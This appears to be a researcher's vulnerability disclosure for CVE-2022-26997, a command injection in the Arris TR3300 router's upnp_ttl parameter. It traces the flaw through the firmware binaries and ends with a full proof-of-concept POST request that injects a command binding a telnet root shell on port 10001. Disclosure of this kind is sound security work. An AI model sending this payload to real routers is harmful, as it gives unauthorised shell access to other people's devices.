Headline
CVE-2022-26997: my_vuln/9.md at main · wudipjq/my_vuln
Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the upnp function via the upnp_ttl parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.
ARRIS Vulnerability
Vendor:ARRIS
Product:TR3300
Version:1.0.13(Download Link:https://arris.secure.force.com/consumers/ConsumerProductDetail?p=a0ha000000OlZ68AAF&c=SURFboard%20Routers)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in ARRIS router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In setup.cgi
binary:
In the router’s upnp
function(lan_sett.html
), upnp_ttl
is directly passed by the attacker, so we can control the upnp_ttl
to attack the OS.
First, accept and process the content of the field(upnp_ttl
), and then call the function nvram_set
to store this input.
In rc_apps
binary:
Eventually, in sub_41B8E8
function, the initial input will be extracted and cause command injection.
Supplement
In order to avoid such problems, we believe that the string content should be checked in the input extraction part.
PoC
We set upnp_ttl
as /usr/sbin/utelnetd -l /bin/sh -p 10001
, and the router will excute it,such as:
POST /setup.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 375 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/lan_sett.html Upgrade-Insecure-Requests: 1
lan_ip=192.168.1.1&lan_mask=255.255.255.0&lan_dhcp=&dhcp_start=192.168.1.2&dhcp_end=192.168.1.254&dhcp_lease=336&domainname=TR3300&nat_mode=0&upnp_enable=&upnp_ttl=`/usr/sbin/utelnetd -l /bin/sh -p 10001`&submit=Apply&h_lan_dhcp=enable&h_dhcp_lease=336&this_file=lan_sett.html&next_file=lan_sett.html&h_nat_mode=0&h_upnp_enable=enable&h_igmp_enable=disable&todo=save&message=
Result
Get a shell!